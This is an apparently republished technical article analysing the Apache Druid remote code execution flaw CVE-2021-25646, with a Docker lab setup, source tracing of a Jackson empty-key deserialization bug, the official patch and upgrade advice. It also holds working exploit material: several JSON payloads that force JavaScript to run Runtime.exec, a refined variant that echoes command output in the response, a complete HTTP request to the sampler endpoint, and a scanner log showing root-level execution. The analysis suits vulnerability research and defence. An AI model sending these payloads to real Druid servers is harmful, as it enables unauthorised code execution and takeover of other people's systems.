Analyzing the Apache Druid remote code execution vulnerability CVE-2021-25646

2025-01-18 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)05/31 Report--

Many newcomers are unsure how to analyze the Apache Druid remote code execution vulnerability CVE-2021-25646. This article walks through the root cause and the fix; hopefully it helps you work through the problem yourself.

Apache Druid remote code execution vulnerability (CVE-2021-25646): lab environment setup

docker-compose.yml

version: "2.2"
volumes:
  metadata_data: {}
  middle_var: {}
  historical_var: {}
  broker_var: {}
  coordinator_var: {}
  router_var: {}
services:
  postgres:
    container_name: postgres
    image: postgres:latest
    volumes:
      - metadata_data:/var/lib/postgresql/data
    environment:
      - POSTGRES_PASSWORD=FoolishPassword
      - POSTGRES_USER=druid
      - POSTGRES_DB=druid
  # Need 3.5 or later for container nodes
  zookeeper:
    container_name: zookeeper
    image: zookeeper:3.5
    environment:
      - ZOO_MY_ID=1
  coordinator:
    image: apache/druid:0.20.0
    container_name: coordinator
    volumes:
      - ./storage:/opt/data
      - coordinator_var:/opt/druid/var
    depends_on:
      - zookeeper
      - postgres
    ports:
      - "8081:8081"
    command:
      - coordinator
    env_file:
      - environment
  broker:
    image: apache/druid:0.20.0
    container_name: broker
    volumes:
      - broker_var:/opt/druid/var
    depends_on:
      - zookeeper
      - postgres
      - coordinator
    ports:
      - "8082:8082"
    command:
      - broker
    env_file:
      - environment
  historical:
    image: apache/druid:0.20.0
    container_name: historical
    volumes:
      - ./storage:/opt/data
      - historical_var:/opt/druid/var
    depends_on:
      - zookeeper
      - postgres
      - coordinator
    ports:
      - "8083:8083"
    command:
      - historical
    env_file:
      - environment
  middlemanager:
    image: apache/druid:0.20.0
    container_name: middlemanager
    volumes:
      - ./storage:/opt/data
      - middle_var:/opt/druid/var
    depends_on:
      - zookeeper
      - postgres
      - coordinator
    ports:
      - "8091:8091"
    command:
      - middleManager
    env_file:
      - environment
  router:
    image: apache/druid:0.20.0
    container_name: router
    volumes:
      - router_var:/opt/druid/var
    depends_on:
      - zookeeper
      - postgres
      - coordinator
    ports:
      - "8888:8888"
    command:
      - router
    env_file:
      - environment

Environment

# Java tuning
DRUID_XMX=1g
DRUID_XMS=1g
DRUID_MAXNEWSIZE=250m
DRUID_NEWSIZE=250m
DRUID_MAXDIRECTMEMORYSIZE=6172m
druid_emitter_logging_logLevel=debug
druid_extensions_loadList=["druid-histogram", "druid-datasketches", "druid-lookups-cached-global", "postgresql-metadata-storage"]
druid_zk_service_host=zookeeper
druid_metadata_storage_host=
druid_metadata_storage_type=postgresql
druid_metadata_storage_connector_connectURI=jdbc:postgresql://postgres:5432/druid
druid_metadata_storage_connector_user=druid
druid_metadata_storage_connector_password=FoolishPassword
druid_coordinator_balancer_strategy=cachingCost
druid_indexer_runner_javaOptsArray=["-server", "-Xmx1g", "-Xms1g", "-XX:MaxDirectMemorySize=4g", "-Duser.timezone=UTC", "-Dfile.encoding=UTF-8", "-Djava.util.logging.manager=org.apache.logging.log4j.jul.LogManager"]
druid_indexer_fork_property_druid_processing_buffer_sizeBytes=268435456
druid_storage_type=local
druid_storage_storageDirectory=/opt/data/segments
druid_indexer_logs_type=file
druid_indexer_logs_directory=/opt/data/indexing-logs
druid_processing_numThreads=2
druid_processing_numMergeBuffers=2
DRUID_LOG4J=

Vulnerability analysis

This section describes how to track down the vulnerability starting from nothing more than the CVE description, without prior knowledge of its details.

Apache Druid includes the ability to execute user-provided JavaScript code embedded in various types of requests. This functionality is intended for use in high-trust environments, and is disabled by default. However, in Druid 0.20.0 and earlier, it is possible for an authenticated user to send a specially-crafted request that forces Druid to run user-provided JavaScript code for that request, regardless of server configuration. This can be leveraged to execute code on the target machine with the privileges of the Druid server process.

From the CVE description we can infer that in Druid 0.20.0 and earlier, code can be executed via JavaScript embedded in a request, regardless of server configuration.

Since the command is executed through JavaScript, the first step is to find the engine Druid uses to parse and run JS.

Consulting the documentation shows that Apache Druid ships with a built-in Rhino engine.

Rhino is a JavaScript engine implemented in Java; scripts it runs can call back into Java classes. Druid uses it to extend functionality dynamically, and the feature is disabled by default.

// core/src/main/java/org/apache/druid/js/JavaScriptConfig.java
@PublicApi
public class JavaScriptConfig
{
  public static final int DEFAULT_OPTIMIZATION_LEVEL = 9;

  private static final JavaScriptConfig ENABLED_INSTANCE = new JavaScriptConfig(true);

  @JsonProperty
  private final boolean enabled;

  @JsonCreator
  public JavaScriptConfig(@JsonProperty("enabled") boolean enabled)
  {
    this.enabled = enabled;
  }
}

The enabled field controls whether JavaScript execution is on, so if we can find a place where this config object is attacker-controllable, we can exploit it.

Next, pick a code path to exploit; JavaScriptDimFilter.java serves as the example. The deserialization chain from the sampler spec down to JavaScriptConfig looks like this:

// indexing-service/src/main/java/org/apache/druid/indexing/overlord/sampler/IndexTaskSamplerSpec.java
public class IndexTaskSamplerSpec implements SamplerSpec
{
  @Nullable
  private final DataSchema dataSchema;
  private final InputSource inputSource;
  /**
   * InputFormat can be null if {@link InputSource#needsFormat()} = false.
   */
  @Nullable
  private final InputFormat inputFormat;
  @Nullable
  private final SamplerConfig samplerConfig;
  private final InputSourceSampler inputSourceSampler;

  @JsonCreator
  public IndexTaskSamplerSpec(
      @JsonProperty("spec") final IndexTask.IndexIngestionSpec ingestionSpec,
      @JsonProperty("samplerConfig") @Nullable final SamplerConfig samplerConfig,
      @JacksonInject InputSourceSampler inputSourceSampler
  )

->

// server/src/main/java/org/apache/druid/segment/indexing/DataSchema.java
  @JsonCreator
  public DataSchema(
      @JsonProperty("dataSource") String dataSource,
      @JsonProperty("timestampSpec") @Nullable TimestampSpec timestampSpec, // can be null in old task spec
      @JsonProperty("dimensionsSpec") @Nullable DimensionsSpec dimensionsSpec, // can be null in old task spec
      @JsonProperty("metricsSpec") AggregatorFactory[] aggregators,
      @JsonProperty("granularitySpec") GranularitySpec granularitySpec,
      @JsonProperty("transformSpec") TransformSpec transformSpec,
      @Deprecated @JsonProperty("parser") @Nullable Map parserMap,
      @JacksonInject ObjectMapper objectMapper
  )

->

// processing/src/main/java/org/apache/druid/segment/transform/TransformSpec.java
  @JsonCreator
  public TransformSpec(
      @JsonProperty("filter") final DimFilter filter,
      @JsonProperty("transforms") final List transforms
  )

->

// processing/src/main/java/org/apache/druid/query/filter/DimFilter.java
@JsonTypeInfo(use = JsonTypeInfo.Id.NAME, property = "type")
@JsonSubTypes(value = {
    @JsonSubTypes.Type(name = "and", value = AndDimFilter.class),
    @JsonSubTypes.Type(name = "or", value = OrDimFilter.class),
    @JsonSubTypes.Type(name = "not", value = NotDimFilter.class),
    @JsonSubTypes.Type(name = "selector", value = SelectorDimFilter.class),
    @JsonSubTypes.Type(name = "columnComparison", value = ColumnComparisonDimFilter.class),
    @JsonSubTypes.Type(name = "extraction", value = ExtractionDimFilter.class),
    @JsonSubTypes.Type(name = "regex", value = RegexDimFilter.class),
    @JsonSubTypes.Type(name = "search", value = SearchQueryDimFilter.class),
    @JsonSubTypes.Type(name = "javascript", value = JavaScriptDimFilter.class),
    @JsonSubTypes.Type(name = "spatial", value = SpatialDimFilter.class),
    @JsonSubTypes.Type(name = "in", value = InDimFilter.class),
    @JsonSubTypes.Type(name = "bound", value = BoundDimFilter.class),
    @JsonSubTypes.Type(name = "interval", value = IntervalDimFilter.class),
    @JsonSubTypes.Type(name = "like", value = LikeDimFilter.class),
    @JsonSubTypes.Type(name = "expression", value = ExpressionDimFilter.class),
    @JsonSubTypes.Type(name = "true", value = TrueDimFilter.class),
    @JsonSubTypes.Type(name = "false", value = FalseDimFilter.class)
})

->

// processing/src/main/java/org/apache/druid/query/filter/JavaScriptDimFilter.java
  @JsonCreator
  public JavaScriptDimFilter(
      @JsonProperty("dimension") String dimension,
      @JsonProperty("function") String function,
      @JsonProperty("extractionFn") @Nullable ExtractionFn extractionFn,
      @JsonProperty("filterTuning") @Nullable FilterTuning filterTuning,
      @JacksonInject JavaScriptConfig config
  )

->

// core/src/main/java/org/apache/druid/js/JavaScriptConfig.java
  @JsonCreator
  public JavaScriptConfig(@JsonProperty("enabled") boolean enabled)
  {
    this.enabled = enabled;
  }

All that remains is figuring out how to control the config object so that JavaScript is enabled. The official patch is helpful here: https://github.com/apache/druid/pull/10818

core/src/main/java/org/apache/druid/guice/GuiceAnnotationIntrospector.java

// We should not allow empty names in any case. However, there is a known bug in Jackson deserializer
// with ignorals (_arrayDelegateDeserializer is not copied when creating a contextual deserializer.
// See https://github.com/FasterXML/jackson-databind/issues/3022 for more details), which makes array
// deserialization failed even when the array is a valid field. To work around this bug, we return
// an empty ignoral when the given Annotated is a parameter with JsonProperty that needs to be deserialized.
// This is valid because every property with JsonProperty annotation should have a non-empty name.
// We can simply remove the below check after the Jackson bug is fixed.
// This check should be fine for so-called delegate creators that have only one argument without
// JsonProperty annotation, because this method is not even called for the argument of
// delegate creators. I am not 100% sure why it's not called, but guess it's because the argument
// is some Java type that Jackson already knows how to deserialize. Since there is only one argument,
// Jackson perhaps is able to just deserialize it without introspection.

As the comment in the patched GuiceAnnotationIntrospector.java explains, even when the key of a key-value pair is empty, Jackson still parses it under certain circumstances and binds the value under that empty key to a constructor parameter that is not annotated with @JsonProperty. The comment also links to the Jackson issue that discusses this behavior.

@JsonCreator marks the constructor Jackson should invoke during JSON deserialization.

@JsonProperty maps a JSON field name onto an attribute; for example, @JsonProperty("before") String after binds the JSON value under the key "before" to the variable after.

When Jackson processes a method annotated with @JsonCreator, all of its parameters are turned into CreatorProperty instances. If a parameter is not annotated with @JsonProperty, Jackson creates a CreatorProperty whose name is the empty string "", and a user-supplied value under the key "" is assigned to that parameter.

Because of this behavior, whenever the conditions above are met we can overwrite such a parameter simply by supplying JSON with an empty-string key.

In the code above, the config parameter is not annotated with @JsonProperty, so when a user passes a key-value pair with an empty key, in the form {"": "ParseToConfig"}, the value ParseToConfig is bound to the config parameter. (ParseToConfig is not actually a JavaScriptConfig; this only illustrates the binding.)

This means the config variable can be controlled in a way the developers never anticipated. Recall what the JavaScriptConfig class shown earlier does with its constructor argument.

To switch enabled to true, we need to construct "": {"enabled": true}.
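Concretely, the empty key rides alongside the javascript filter inside transformSpec, so Jackson binds it to the un-annotated @JacksonInject config parameter of JavaScriptDimFilter. A minimal sketch of just the filter object (field values are placeholders, abbreviated from the full POC below):

```json
{
  "filter": {
    "type": "javascript",
    "dimension": "added",
    "function": "function(value) { /* attacker-controlled JavaScript */ }",
    "": { "enabled": true }
  }
}
```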

A complete request body can be built from the code above, or found ready-made; there are many examples in public write-ups and READMEs.

JavaScript parsing entry

// org.apache.druid.query.filter.JavaScriptDimFilter
public boolean applyInContext(Context cx, Object input)
{
  if (extractionFn != null) {
    input = extractionFn.apply(input);
  }
  return Context.toBoolean(fnApply.call(cx, scope, scope, new Object[]{input}));
}

Differences between new and old versions

Testing against the older 0.15.0 release shows the POC is not universal: the server responds with "[spec.ioConfig.firehose] is required". The corresponding code:

// indexing-service/src/main/java/org/apache/druid/indexing/overlord/sampler/IndexTaskSamplerSpec.java
// Old (0.15.0-era) constructor:
@JsonCreator
public IndexTaskSamplerSpec(
    @JsonProperty("spec") final IndexTask.IndexIngestionSpec ingestionSpec,
    @JsonProperty("samplerConfig") final SamplerConfig samplerConfig,
    @JacksonInject FirehoseSampler firehoseSampler
)
{
  this.dataSchema = Preconditions.checkNotNull(ingestionSpec, "[spec] is required").getDataSchema();
  Preconditions.checkNotNull(ingestionSpec.getIOConfig(), "[spec.ioConfig] is required");
  this.firehoseFactory = Preconditions.checkNotNull(
      ingestionSpec.getIOConfig().getFirehoseFactory(),
      "[spec.ioConfig.firehose] is required");
  this.samplerConfig = samplerConfig;
  this.firehoseSampler = firehoseSampler;
}

// New (0.20.0) constructor:
@JsonCreator
public IndexTaskSamplerSpec(
    @JsonProperty("spec") final IndexTask.IndexIngestionSpec ingestionSpec,
    @JsonProperty("samplerConfig") @Nullable final SamplerConfig samplerConfig,
    @JacksonInject InputSourceSampler inputSourceSampler
)
{
  this.dataSchema = Preconditions.checkNotNull(ingestionSpec, "[spec] is required").getDataSchema();
  Preconditions.checkNotNull(ingestionSpec.getIOConfig(), "[spec.ioConfig] is required");
  if (ingestionSpec.getIOConfig().getInputSource() != null) {
    this.inputSource = ingestionSpec.getIOConfig().getInputSource();
    if (ingestionSpec.getIOConfig().getInputSource().needsFormat()) {
      this.inputFormat = Preconditions.checkNotNull(
          ingestionSpec.getIOConfig().getInputFormat(),
          "[spec.ioConfig.inputFormat] is required");
    } else {
      this.inputFormat = null;
    }
  } else {
    final FirehoseFactory firehoseFactory = Preconditions.checkNotNull(
        ingestionSpec.getIOConfig().getFirehoseFactory(),
        "[spec.ioConfig.firehose] is required");
    if (!(firehoseFactory instanceof FiniteFirehoseFactory)) {
      throw new IAE("firehose should be an instanceof FiniteFirehoseFactory");
    }
    this.inputSource = new FirehoseFactoryToInputSourceAdaptor(
        (FiniteFirehoseFactory) firehoseFactory,
        ingestionSpec.getDataSchema().getParser());
    this.inputFormat = null;
  }
  this.samplerConfig = samplerConfig;
  this.inputSourceSampler = inputSourceSampler;
}

This file has been modified three times over its history, and in old versions the firehose field is mandatory. Note also that in 0.15.0 the firehose type does not support inline, so another type has to be used instead.

0.20.0 POC

{
  "type": "index",
  "spec": {
    "ioConfig": {
      "type": "index",
      "inputSource": {
        "type": "inline",
        "data": "{\"timestamp\":\"2020-12-12T12:10:21.040Z\",\"xxx\":\"x\"}"
      },
      "inputFormat": {
        "type": "json",
        "keepNullColumns": true
      }
    },
    "dataSchema": {
      "dataSource": "sample",
      "timestampSpec": {
        "column": "timestamp",
        "format": "iso"
      },
      "dimensionsSpec": {},
      "transformSpec": {
        "transforms": [],
        "filter": {
          "type": "javascript",
          "dimension": "added",
          "function": "function(value) {java.lang.Runtime.getRuntime().exec('command')}",
          "": {
            "enabled": true
          }
        }
      }
    },
    "type": "index",
    "tuningConfig": {
      "type": "index"
    }
  },
  "samplerConfig": {
    "numRows": 500,
    "timeoutMs": 15000
  }
}

To stay compatible with the old version, the POC is adapted: the newer inputSource is replaced with firehose, inputFormat is removed, and a parser is used to parse the files instead.

{
  "type": "index",
  "spec": {
    "ioConfig": {
      "type": "index",
      "firehose": {
        "type": "local",
        "baseDir": "/xxx",
        "filter": "xxx"
      }
    },
    "dataSchema": {
      "dataSource": "%%DATASOURCE%%",
      "parser": {
        "parseSpec": {
          "format": "json",
          "timestampSpec": {},
          "dimensionsSpec": {}
        }
      }
    }
  },
  "samplerConfig": {
    "numRows": 10
  }
}

The tortuous road to command echo

For use in a scanner, the POC should work against both old and new versions and detect the vulnerability accurately. Executing the command without any echo is not enough (consider hosts that cannot make outbound connections).

Ideas for getting echo

1. Grab the request/response objects of the current thread and modify the response content directly

2. Echo through error messages

3. Write the output to a file, then read the file back

4. Linux socket file descriptors (Druid does not run on Windows)

5. ...
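Option 3 is the route taken below. The JS payloads that follow all rely on a classic Java idiom for draining a process's stdout: a java.util.Scanner whose delimiter is the regex \A (start of input) never finds a second token boundary, so a single next() call returns the whole stream. A minimal sketch in plain Java (class name and sample command are illustrative, not from the original POC):

```java
import java.io.IOException;
import java.util.Scanner;

public class CommandEcho {
    // Runs a command and returns its entire stdout (stderr merged in) as one String.
    // The delimiter "\\A" anchors at start-of-input and never matches again,
    // so next() consumes the whole stream in a single call.
    static String runAndCapture(String... cmd) throws IOException {
        Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
        try (Scanner s = new Scanner(p.getInputStream()).useDelimiter("\\A")) {
            return s.hasNext() ? s.next() : "";
        }
    }

    public static void main(String[] args) throws IOException {
        System.out.print(runAndCapture("echo", "hello"));
    }
}
```

In the Rhino payloads this appears as new java.util.Scanner(cmd.getInputStream()).useDelimiter("\\A").next().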

Echo by writing and reading files

The executed command's result is written to /tmp in JSON format, using the Jackson classes already on Druid's classpath:

function(value){
  var a = new java.io.BufferedWriter(new java.io.FileWriter("/tmp/123.json"));
  var cmd = java.lang.Runtime.getRuntime().exec("{{command}}");
  var test = new com.fasterxml.jackson.databind.ObjectMapper();
  var jsonObj = test.createObjectNode();
  jsonObj.put("time", "2015-09-12T00:46:58.771Z");
  jsonObj.put("test", new java.util.Scanner(cmd.getInputStream()).useDelimiter("\\A").next());
  a.write(jsonObj.toString());
  a.close();
}

The command result is then obtained by writing it to that file and using Druid's own local-file reading to read the file back.
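The read-back step can reuse the old-version local firehose shown above, pointed at the file the payload just wrote. A sketch (paths and names follow the /tmp/123.json example; this is illustrative, not a canonical request):

```json
{
  "type": "index",
  "spec": {
    "ioConfig": {
      "type": "index",
      "firehose": { "type": "local", "baseDir": "/tmp", "filter": "123.json" }
    },
    "dataSchema": {
      "dataSource": "sample",
      "parser": {
        "parseSpec": { "format": "json", "timestampSpec": {}, "dimensionsSpec": {} }
      }
    }
  },
  "samplerConfig": { "numRows": 10 }
}
```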

But there is a pitfall here: to keep one POC compatible with both old and new versions, inline cannot be used, so the local method is used instead. If the file being read does not match the expected format, however, parsing exits abnormally and execution never reaches the point where the command runs.

This imposes a precondition: a file that parses cleanly must be found so that no error is raised (new versions can simply use inline data and are unaffected).

That dependency is clearly not what we want. Reading the code further reveals that a function can also be executed during parsing itself: with a javascript parseSpec, the function runs while each row is parsed, so the command finishes executing before any exception is thrown.

"dataSchema": {
  "dataSource": "%%DATASOURCE%%",
  "parser": {
    "parseSpec": {
      "format": "javascript",
      "timestampSpec": {},
      "dimensionsSpec": {},
      "function": "function(){xxxx}",
      "": {
        "enabled": "true"
      }
    }
  }
}

Direct command echo

Looking at the parseSpec documentation, it turns out the function can shape the echoed content directly: whatever {key: value} object it returns is sent back in the response.

The improved POC outputs the command result directly in the response page:

{
  "type": "index",
  "spec": {
    "ioConfig": {
      "type": "index",
      "firehose": {
        "type": "local",
        "baseDir": "/etc",
        "filter": "passwd"
      }
    },
    "dataSchema": {
      "dataSource": "%%DATASOURCE%%",
      "parser": {
        "parseSpec": {
          "format": "javascript",
          "timestampSpec": {},
          "dimensionsSpec": {},
          "function": "function(){var s = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\"{{command}}\").getInputStream()).useDelimiter(\"\\\\A\").next(); return {timestamp: \"2013-09-01T12:41:27Z\", test: s}}",
          "": {
            "enabled": "true"
          }
        }
      }
    }
  },
  "samplerConfig": {
    "numRows": 10
  }
}

Vulnerability fix

Upgrade to Apache Druid 0.20.1.

Strengthen access control and prohibit unauthorized users from accessing the web management page.

Official code fix:

// org.apache.druid.guice.GuiceAnnotationIntrospector
@Override
public JsonIgnoreProperties.Value findPropertyIgnorals(Annotated ac)
{
  if (ac instanceof AnnotatedParameter) {
    final AnnotatedParameter ap = (AnnotatedParameter) ac;
    if (ap.hasAnnotation(JsonProperty.class)) {
      return JsonIgnoreProperties.Value.empty();
    }
  }
  return JsonIgnoreProperties.Value.forIgnoredProperties("");
}

This overrides the findPropertyIgnorals method of Jackson's AnnotationIntrospector, whose default implementation is:

// com.fasterxml.jackson.databind.AnnotationIntrospector
public JsonIgnoreProperties.Value findPropertyIgnorals(Annotated ac)
{
  // 18-Oct-2016, tatu: Used to call deprecated methods for backwards
  //   compatibility in 2.8, but not any more in 2.9
  return JsonIgnoreProperties.Value.empty();
}

The base implementation returns JsonIgnoreProperties.Value.empty(), which means Jackson tolerates a property with an empty name.

After the fix, the logic is: an empty name is permitted when the parameter is annotated with @JsonProperty (as a workaround for the Jackson array bug), and the empty name is explicitly ignored when the parameter is not annotated with @JsonProperty.

Exploit

POST /druid/indexer/v1/sampler HTTP/1.1
Host: localhost:8888
Accept: application/json, text/plain
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 902
Connection: keep-alive

{"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"/etc","filter":"passwd"}},"dataSchema":{"dataSource":"%%DATASOURCE%%","parser":{"parseSpec":{"format":"javascript","timestampSpec":{},"dimensionsSpec":{},"function":"function(){var s = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\"{{command}}\").getInputStream()).useDelimiter(\"\\\\A\").next(); return {timestamp:\"2013-09-01T12:41:27Z\", test: s}}","":{"enabled":"true"}}}}},"samplerConfig":{"numRows":10}}

PSF case

╭─ huakai at huakai-deMacBook-Pro in ~/go/src/phenixsuite (develop)
╰─ λ ./phenixsuite scan --poc static/pocs/apache-druid-cve-2021-25646-rce-attack.yml --url http://127.0.0.1:8888 --mode attack --options shell
input command (require): id
2021/02/04 11:20:47 scan.go:496: [INFO] attack poc-yaml-apache-druid-cve-2021-25646-rce-attack
2021/02/04 11:20:47 scan.go:142: [INFO] scan poc num:1 total:1
2021/02/04 11:20:48 scan.go:633: [INFO] poc:poc-yaml-apache-druid-cve-2021-25646-rce-attack execute success
2021/02/04 11:20:48 scan.go:313: [INFO] vul exist poc:poc-yaml-apache-druid-cve-2021-25646-rce-attack url: http://127.0.0.1:8888

#  target-url             poc-name                                         gev-id      level     category   status  author  detail-extend
1  http://127.0.0.1:8888  poc-yaml-apache-druid-cve-2021-25646-rce-attack  GEV-143659  critical  code-exec  exist   huakai  uid=0(root) gid=0(root) groups=0(root)
